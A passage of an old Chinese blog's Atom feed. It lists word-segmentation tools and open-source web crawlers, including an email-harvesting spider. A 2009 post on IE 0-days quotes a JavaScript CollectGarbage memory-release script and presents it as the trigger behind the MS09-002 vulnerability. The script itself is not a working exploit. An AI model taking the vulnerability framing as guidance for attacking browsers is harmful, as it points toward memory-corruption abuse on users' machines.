<strong>2、海量智能分词研究版</strong><br />
海量智能计算技术研究中心为了使中文<span class="t_tag" href="tag.php?name=%D0%C5%CF%A2">信息</span>处理领域的研究者们能够共同分享海量智能中心的研究成果，共同提高中文<span class="t_tag" href="tag.php?name=%D0%C5%CF%A2">信息</span>处理水平，特此发布《海量智能分词研究版》，供专家、学者和爱好者进行研究。<br />
下载页面：<a target="_blank" href="http://www.hylanda.com/cgi-bin/download/download.asp?id=8"><font color="#0000ff">http://www.hylanda.com/cgi-bin/download/download.asp?id=8</font></a><br />
<br />
<strong>3、其他</strong><br />
（1）CSW中文智能分词组件<br />
运行环境：Windows NT、2000、XP 或更高，可以在 ASP，VB 等微软的开发语言中调用。<br />
简介: CSW中文智能分词DLL组件，可将一段文本自动的按常规汉语词组进行拆分,并以指定方式进行分隔，且可对其拆分后的词组进行语义、词频标注。其广范应用于各行各业的信息资料检索、分析。<br />
下载页面：<a target="_blank" href="http://www.vgoogle.net/"><font color="#0000ff">http://www.vgoogle.net/</font></a><br />
（2） C# 写的中文分词组件<br />
据作者介绍，一个 DLL 文件，可以做中英文分词组件。完全C#托管代码编写，独立开发。<br />
下载页面：<a target="_blank" href="http://www.rainsts.net/article.asp?id=48"><font color="#0000ff">http://www.rainsts.net/article.asp?id=48</font></a><br />
<strong>三、<u><font color="#0000ff">开源spider一览</font></u></strong><br />
<font face="Courier New "><font size="2">spider是搜索引擎的必须模块.spider数据的结果直接影响到搜索引擎的评价指标.</font></font><br />
<font face="Courier New "><font size="2">第一个spider程序由MIT的</font></font><a target="_blank" href="http://stuff.mit.edu/~mkgray/net/web-growth-summary.html"><font face="Courier New "><font size="2"><font color="#0000ff">Matthew K Gray</font></font></font></a><font face="Courier New "><font size="2">操刀该程序的目的是为了统计<span class="t_tag" href="http://www.friddy.cn/tag.php?name=%BB%A5%C1%AA%CD%F8">互联网</span>中主机的数目</font></font><br />
<font face="Courier New "><font size="2">Spier定义(关于Spider的定义,有广义和狭义两种).</font></font><br />
&nbsp;</p>
<ul>
    <li><font face="Courier New "><font size="2">狭义:利用标准的http协议根据超链和web文档检索的方法遍历万维网信息空间的软件程序. </font></font></li>
    <li><font face="Courier New "><font size="2">广义:所有能利用http协议检索web文档的软件都称之为spider. </font></font></li>
</ul>
<p><font face="Courier New "><font size="2">其中Protocol Gives Sites Way To Keep Out The 'Bots Jeremy Carl, Web Week, Volume 1, Issue 7, November 1995 是和spider息息相关的协议,大家有兴趣参考</font></font><a target="_blank" href="http://www.robotstxt.org/wc/robots.html"><font face="Courier New "><font size="2"><font color="#0000ff">robotstxt.org</font></font></font></a><font face="Courier New "><font size="2">.</font></font><br />
<font face="Courier New "><font size="2"><font color="#000000">Heritrix </font></font></font><br />
<font face="Courier New "><font size="2">Heritrix is the Internet Archive's open-source, extensible, web-scale, archival-quality web crawler project.</font></font><br />
<font face="Courier New "><font size="2"><em>Heritrix</em> (sometimes spelled <em>heretrix</em>, or misspelled or missaid as <em>heratrix</em>/<em>heritix</em>/ <em>heretix</em>/<em>heratix</em>) is an archaic word for <em>heiress</em> (woman who inherits). Since our crawler seeks to collect and <em>preserve</em> the digital artifacts of our culture for the benefit of future researchers and generations, this name seemed apt.</font></font><br />
<font face="Courier New "><font size="2">语言:JAVA, (</font></font><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=73833&amp;package_id=73980"><font face="Courier New "><font size="2"><font color="#0000ff">下载地址</font></font></font></a><font face="Courier New "><font size="2">)</font></font><br />
<font color="#000000"><strong><font face="Courier New "><font size="2">WebLech URL Spider </font></font><br />
</strong></font><font face="Courier New "><font size="2">WebLech is a fully featured web site download/mirror tool in Java, which supports many features required to download websites and emulate standard web-browser behaviour as much as possible. WebLech is multithreaded and comes with a GUI console. </font></font><br />
<font face="Courier New "><font size="2">语言:JAVA, (</font></font><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=38170"><font face="Courier New "><font size="2"><font color="#0000ff">下载地址</font></font></font></a><font face="Courier New "><font size="2">)</font></font><br />
<font face="Courier New "><font size="2"><font color="#000000"><strong>JSpider</strong></font></font></font><br />
<font face="Courier New "><font size="2">A Java implementation of a flexible and extensible web spider engine. Optional modules allow functionality to be added (searching dead links, testing the performance and scalability of a site, creating a sitemap, etc .. </font></font><br />
<br />
<font face="Courier New "><font size="2">语言:JAVA, (</font></font><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=65617"><font face="Courier New "><font size="2"><font color="#0000ff">下载地址</font></font></font></a><font face="Courier New "><font size="2">)</font></font><br />
<font face="Courier New "><font size="2"><strong>WebSPHINX </strong></font></font><br />
<font face="Courier New "><font size="2">WebSPHINX is a web crawler (robot, spider) Java class library, originally developed by Robert Miller of Carnegie Mellon University. Multithreaded, tollerant HTML parsing, URL filtering and page classification, pattern matching, mirroring, and more. </font></font><br />
<br />
<font face="Courier New "><font size="2">语言:JAVA, (</font></font><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=48810"><font face="Courier New "><font size="2"><font color="#0000ff">下载地址</font></font></font></a><font face="Courier New "><font size="2">)</font></font><br />
<font face="Courier New "><font size="2"><font color="#000000"><strong>PySolitaire </strong></font></font></font><br />
<font face="Courier New "><font size="2">PySolitaire is a fork of PySol Solitaire that runs correctly on Windows and has a nice clean installer. PySolitaire (Python Solitaire) is a collection of more than 300 solitaire and Mahjongg games like Klondike and Spider. <br />
</font></font><br />
<font face="Courier New "><font size="2">语言<img alt="" border="0" smilieid="7" src="http://bbs.sowang.com/images/smilies/default/tongue.gif" />ython , (</font></font><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=86107"><font face="Courier New "><font size="2"><font color="#0000ff">下载地址</font></font></font></a><font face="Courier New "><font size="2">)</font></font><br />
<font face="Courier New "><font size="2"><font color="#000000"><strong>The Spider Web Network Xoops Mod Team</strong> &nbsp;&nbsp;&nbsp;</font></font></font><br />
<font face="Courier New "><font size="2">The Spider Web Network Xoops Module Team provides modules for the Xoops community written in the PHP coding language. We develop mods and or take existing php script and port it into the Xoops format. High quality mods is our goal. <br />
</font></font><br />
<font face="Courier New "><font size="2">语言:php , (</font></font><a target="_blank" href="http://sourceforge.net/projects/tswnmoddev"><font face="Courier New "><font size="2"><font color="#0000ff">下载地址</font></font></font></a><font face="Courier New "><font size="2">)</font></font><br />
<font face="Courier New "><font size="2"><font color="#000000"><strong>Fetchgals </strong></font></font></font><br />
<font face="Courier New "><font size="2">A multi-threaded web spider that finds free porn thumbnail galleries by visiting a list of known TGPs (Thumbnail Gallery Posts). It optionally downloads the located pictures and movies. TGP list is included. Public domain perl script running on Linux. </font></font><br />
<br />
<br />
<font face="Courier New "><font size="2">语言:perl , (</font></font><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=110338"><font face="Courier New "><font size="2"><font color="#0000ff">下载地址</font></font></font></a><font face="Courier New "><font size="2">)</font></font><br />
<br />
<font face="Courier New "><font size="2"><font face="Courier New "><font size="2"><font color="#000000"><font face="Courier New "><font size="2"><font color="#000000"><font color="#0033cc"><font face="Courier New "><font size="2"><font color="#000000"><font face="Courier New "><font size="2"><font color="#000000"><font color="#0033cc"><strong>Where Spider</strong></font></font></font></font></font></font></font></font> </font></font></font></font></font></font><br />
<font face="Courier New "><font size="2"><br />
The purpose of the Where Spider software is to provide a database system for storing URL addresses. The software is used for both ripping links and browsing them offline. The software uses a pure XML database which is easy to export and import. <br />
<font face="Courier New "><font size="2">语言:XML , (</font></font><font face="Courier New "><font size="2"><font color="#0000ff"><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=115931">下载地址</a></font></font></font><font face="Courier New "><font size="2">)</font></font><br />
<br />
<font face="Courier New "><font size="2">Sperowider Website Archiving Suite is a set of Java applications, the primary purpose of which is to spider dynamic websites, and to create static distributable archives with a full text search index usable by an associated Java applet. <br />
<font face="Courier New "><font size="2">语言:Java , (</font></font><font face="Courier New "><font size="2"><font color="#0000ff"><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=90254">下载地址</a></font></font></font><font face="Courier New "><font size="2">)</font></font><br />
<font face="Courier New "><font size="2">SpiderPy is a web crawling spider program written in Python that allows users to collect files and search web sites through a configurable interface. <br />
<font face="Courier New "><font size="2">语言<img alt="" border="0" smilieid="7" src="http://bbs.sowang.com/images/smilies/default/tongue.gif" />ython , (</font></font><font face="Courier New "><font size="2"><font color="#0000ff"><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=55531">下载地址</a></font></font></font><font face="Courier New "><font size="2">)</font></font><br />
<br />
<font face="Courier New "><font size="2">Spider is a complete standalone Java application designed to easily integrate varied datasources. * XML driven framework * Scheduled pulling * Highly extensible * Provides hooks for custom post-processing and configuration <br />
<font face="Courier New "><font size="2">语言:Java , (</font></font><font face="Courier New "><font size="2"><font color="#0000ff"><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=90769">下载地址</a></font></font></font><font face="Courier New "><font size="2">)</font></font><br />
<br />
<font face="Courier New "><font size="2">WebLoupe is a java-based tool for analysis, interactive visualization (sitemap), and exploration of the information architecture and specific properties of local or publicly accessible websites. Based on web spider (or web crawler) technology. <br />
<font face="Courier New "><font size="2">语言:java , (</font></font><font face="Courier New "><font size="2"><font color="#0000ff"><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=121963">下载地址</a></font></font></font><font face="Courier New "><font size="2">)</font></font><br />
<font face="Courier New "><font size="2"><font color="#000000"><strong>ASpider</strong></font></font></font><br />
<font face="Courier New "><font size="2">Robust featureful multi-threaded CLI web spider using apache commons httpclient v3.0 written in java. ASpider downloads any files matching your given mime-types from a website. Tries to reg.exp. match emails by default, logging all results using log4j. <br />
<font face="Courier New "><font size="2">语言:java , (</font></font><font face="Courier New "><font size="2"><font color="#0000ff"><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=126578">下载地址</a></font></font></font><font face="Courier New "><font size="2">)</font></font><br />
<strong>larbin </strong><br />
Larbin is an HTTP Web crawler with an easy interface that runs under Linux. It can fetch more than 5 million pages a day on a standard PC (with a good network). <br />
语言:C++, (<font face="Courier New "><font size="2"><font color="#0000ff"><a target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=42562">下载地址</a></font></font></font><font face="Courier New "><font size="2">)</font></font><br />
</font></font></font></font></font></font><font face="Courier New "><font size="2"><font color="#000000"><strong>webloupe</strong></font></font></font></font></font><font face="Courier New "><font size="2"><font color="#000000"><strong>Spidered Data Retrieval</strong></font></font></font></font></font><font face="Courier New "><font size="2"><font color="#000000"><strong>SpiderPy</strong></font></font></font></font></font><font face="Courier New "><font size="2"><font color="#000000"><strong>Sperowider</strong></font></font></font></font></font></p>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=109" /> 
	  <id>http://www.friddy.cn/default.asp?id=109</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[后漏洞时代，大话IE 0day揭秘]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=12" label="水谭" /> 
	  <updated>2009-10-22T10:26:13+08:00</updated>
	  <published>2009-10-22T10:26:13+08:00</published>
		  <summary type="html"><![CDATA[这个时代，IE远程“溢出”，已经是不能叫“溢出”的时代<br/><br/>一个Crash，就能崩溃IE，地址高的话，就能Execute any code!<br/><br/>今年2月份，出的ms9002，实际在2006年12月的时候，已经有人发现。而触发漏洞的人，只是一个写<br/><br/>javascript的程序员，但是他并没有对漏洞做任何的利用。<br/><br/><br/>大家可以看看他当年的脚本吧：<br/><i>我使用任务管理器，打开一个弹出窗口，ie内存就增加1-3m，然后关闭窗口，有时内存并不释放，有时才释放几十k。看来问题出在了内存释放上面。<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;接着按内存释放这个思路，进行搜索查找方法，来进行解决这个问题。我找到一个javascript未公开的函数CollectGarbage，这个函数是用来进行内存释放的。我在所有的弹出窗口结束之前把所有的自己定义的javasctip的变量设置为null，并调用CollectGarbage函数。<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;javascript中把变量设为null，javascript并不会把内存释放，当下次再次定义变量时，就会覆盖此变量所在的内存。如果不设为null，javascript再次定义变量时，会开辟一个新的内存空间。<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;在使用以上处理之后，再次打开窗口，ie的内存每次还是增加1-3m，但是在关闭窗口之后，则ie会释放一定数量的内存在500k至2m。起到了一定的作用。<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 由于我在页面中使用了第三方的控件，第三方的控件中的javascript中的内存是如何管理，就不是由我来控制的了。<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/><br/><br/>1.javascript内存释放的方法示例<br/><br/><br/>&nbsp;&nbsp;把所有上级函数的参数即使设为null，并使用CollectGarbage来释放内存。&nbsp;&nbsp; <br/><br/><br/>示例<br/>&nbsp;&nbsp;&lt;script&gt;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;//32M&nbsp;&nbsp; <br/>&nbsp;&nbsp;function&nbsp;&nbsp; AllocMem()&nbsp;&nbsp; <br/>&nbsp;&nbsp;{&nbsp;&nbsp; <br/>&nbsp;&nbsp;var&nbsp;&nbsp; str=&#34;12345678&#34;;&nbsp;&nbsp; <br/>&nbsp;&nbsp;for(var&nbsp;&nbsp; i=3;i&lt;24;i++)&nbsp;&nbsp; <br/>&nbsp;&nbsp;str+=str;&nbsp;&nbsp; <br/>&nbsp;&nbsp;return&nbsp;&nbsp; str;&nbsp;&nbsp; <br/>&nbsp;&nbsp;}&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;function&nbsp;&nbsp; A(a)&nbsp;&nbsp; <br/>&nbsp;&nbsp;{&nbsp;&nbsp; <br/>&nbsp;&nbsp;a=null;&nbsp;&nbsp; <br/>&nbsp;&nbsp;return&nbsp;&nbsp; r;&nbsp;&nbsp; <br/>&nbsp;&nbsp;function&nbsp;&nbsp; r()&nbsp;&nbsp; <br/>&nbsp;&nbsp;{&nbsp;&nbsp; <br/>&nbsp;&nbsp;}&nbsp;&nbsp; <br/>&nbsp;&nbsp;}&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;var&nbsp;&nbsp; f=A(AllocMem());&nbsp;&nbsp; <br/>&nbsp;&nbsp;alert(1);&nbsp;&nbsp; <br/>&nbsp;&nbsp;CollectGarbage();&nbsp;&nbsp; <br/>&nbsp;&nbsp;//明显，已经释放了。&nbsp;&nbsp; <br/>&nbsp;&nbsp;r=null;&nbsp;&nbsp; <br/>&nbsp;&nbsp;alert(2);&nbsp;&nbsp; <br/>&nbsp;&nbsp;CollectGarbage();&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&lt;/script&gt;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;----------&nbsp;&nbsp; <br/>&nbsp;&nbsp;里面对于内存释放的规则（脚本层）已经理解得很透了。&nbsp;&nbsp; <br/>&nbsp;&nbsp;(每一层菜单分配?M的内存.对着任务管理器才看到情况)&nbsp;&nbsp; <br/><br/><br/>注:<br/>CollectGarbage()通常会在核心推出内存，因就是IE或NS程序结束的时候才会调用.这样才是安全的&nbsp;&nbsp; <br/><br/> </i>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=108" /> 
	  <id>http://www.friddy.cn/default.asp?id=108</id>
  </entry>	
		
</feed>
